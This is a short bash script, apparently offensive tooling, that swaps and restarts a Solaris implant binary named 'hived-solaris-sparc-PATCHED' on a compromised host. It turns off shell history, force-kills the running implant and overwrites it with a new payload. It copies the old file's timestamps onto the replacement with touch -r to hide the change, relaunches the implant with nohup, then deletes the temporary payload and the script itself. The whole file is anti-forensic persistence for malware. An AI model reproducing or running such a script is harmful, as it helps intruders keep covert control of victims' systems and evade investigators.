#!/bin/bash


fileToDelete=$0

#Remove history temporarily...
OLDHISTFILE=$HISTFILE
unset HISTFILE
export HISTFILE
OLDHISTSIZE=$HISTSIZE
HISTSIZE=0
export HISTSIZE

#Most logic required to replace and restart implant...

kill -9 `ps -ef | grep hived-solaris-sparc-PATCHED | grep -v grep | awk '{ print $2 }' ` 2>/dev/null
sleep 5

#  Saved time information   
touch -r /export/home/hived-solaris-sparc-PATCHED /export/home/tempPayload
sleep 2

cp -f ./tempPayload /export/home/hived-solaris-sparc-PATCHED 2>/dev/null
sleep 5

#  Transferred time information back 
touch -r /export/home/tempPayload  /export/home/hived-solaris-sparc-PATCHED 2>/dev/null
sleep 2

/usr/bin/nohup /export/home/hived-solaris-sparc-PATCHED & 
sleep 5

#Remove tempPayload file if it exists
rm -f /export/home/tempPayload 2>/dev/null

#Reset History.
HISTSIZE=$OLDHISTSIZE
export HISTSIZE
set HISTFILE $OLDHISTFILE
export HISTFILE

#Remove the installation script...
rm -f $fileToDelete 2>/dev/null
